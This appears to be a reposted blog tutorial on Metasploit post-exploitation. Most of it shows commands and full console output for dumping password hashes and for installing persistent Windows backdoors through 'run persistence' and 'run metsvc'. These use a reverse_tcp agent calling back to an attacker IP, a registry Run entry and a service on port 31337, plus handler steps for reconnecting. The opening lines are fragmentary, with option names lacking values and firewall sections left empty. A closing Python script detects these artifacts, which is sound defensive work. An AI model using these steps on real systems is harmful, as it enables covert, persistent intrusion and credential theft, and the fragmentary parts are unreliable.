search autopwn

use server/browser_autopwn

show options

set LHOST

set SRVPORT

set URIPATH /

show options

Edit the etter.conf file

if you use ipchains

if you use iptables

After obtaining sessions

run hashdump

run persistence -X -i 5 -p 445 -r 192.168.1.106

Metasploit: a couple of ways to set up a backdoor

1. Meterpreter's built-in scripts

Method 1. run persistence

Use run persistence -h to view the options:

meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139

[*] Running Persistance Script

[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc

[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=443

[*] Persistent agent script is 609496 bytes long

[+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs

[*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs

[+] Agent executed with PID 3272

[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY

[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY

As the output shows, autostart is set up by adding a registry value, and what it launches is the VBS script backdoor.

Connect:

msf > use exploit/multi/handler

msf  exploit(handler) > set payload windows/metsvc_bind_tcp

payload => windows/metsvc_bind_tcp

msf  exploit(handler) > set LHOST 192.168.1.139

LHOST => 192.168.1.139

msf  exploit(handler) > set LPORT 443

LPORT => 443

msf  exploit(handler) > exploit

[*] Started bind handler

[*] Starting the payload handler...

It is not started by default; after the target machine reboots, a meterpreter shell is obtained successfully.

Method 2. run metsvc

Run the metsvc script

meterpreter > run metsvc -A

[*] Creating a meterpreter service on port 31337

[*] Creating a temporary installation directory C:\WINDOWS\TEMP\kqaqtcsWhBTbO...

[*]  >> Uploading metsrv.dll...

[*]  >> Uploading metsvc-server.exe...

[*]  >> Uploading metsvc.exe...

[*] Starting the service...

* Installing service metsvc

* Starting service

Service metsvc successfully installed.

[*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...

A new service is created and set to start automatically (image name metsvc.exe, service metsvc). Connect to the backdoor:

msf > use exploit/multi/handler

msf  exploit(handler) > set payload windows/metsvc_bind_tcp

payload => windows/metsvc_bind_tcp

msf  exploit(handler) > set LPORT 31337

LPORT => 31337

msf  exploit(handler) > set RHOST 192.168.1.108

RHOST => 192.168.1.108

msf  exploit(handler) > exploit

[*] Started bind handler

[*] Starting the payload handler...

meterpreter >

Connected successfully
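A defender-side check for the artifacts the two transcripts above leave behind (a Run value launching a script from a temp directory, a service named metsvc, a listener on port 31337), as an added example that is not part of the original post. The sample text is constructed, the function names are hypothetical, and the service name and port are simply the ones shown in the transcript.

```python
import re

# Constructed sample text (not from a real host), shaped like the output of
# `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, `sc query`
# and `netstat -ano`; artifact names are the ones in the transcripts above.
REG_SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    FCBCUBtLrzFY    REG_SZ    C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
"""
SC_SAMPLE = "SERVICE_NAME: Dhcp\nSERVICE_NAME: metsvc\n"
NETSTAT_SAMPLE = """
  TCP    0.0.0.0:135      0.0.0.0:0    LISTENING    912
  TCP    0.0.0.0:31337    0.0.0.0:0    LISTENING    1480
"""

RUN_VALUE = re.compile(r"^\s+(\S.*?)\s{4}(REG_\w+)\s{4}(.+)$")
TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.I)
SCRIPT = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)\b", re.I)

def suspicious_run_values(reg_text):
    """Run values that start a script from a temp directory. The value and
    file names in the transcript look random, so match behaviour, not names."""
    hits = []
    for line in reg_text.splitlines():
        m = RUN_VALUE.match(line)
        if m and TEMP_DIR.search(m.group(3)) and SCRIPT.search(m.group(3)):
            hits.append((m.group(1), m.group(3).strip()))
    return hits

def find_services(sc_text, names=("metsvc",)):
    """Service names from `sc query` output that are on the watch list."""
    found = re.findall(r"^SERVICE_NAME:\s*(\S+)", sc_text, re.M)
    return [s for s in found if s.lower() in names]

def listeners_on(netstat_text, ports=(31337,)):
    """(port, pid) for TCP listeners on watched ports in `netstat -ano` output."""
    hits = []
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP" and f[3] == "LISTENING":
            port = int(f[1].rsplit(":", 1)[1])
            if port in ports:
                hits.append((port, int(f[4])))
    return hits

if __name__ == "__main__":
    print(suspicious_run_values(REG_SAMPLE))
    print(find_services(SC_SAMPLE), listeners_on(NETSTAT_SAMPLE))
```

The PID returned by `listeners_on` can be matched against the process list to confirm which image owns the listening socket.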

Original article: https://www.cnblogs.com/journeyIT/p/8259946.html

Time: 2024-08-30 04:25:15
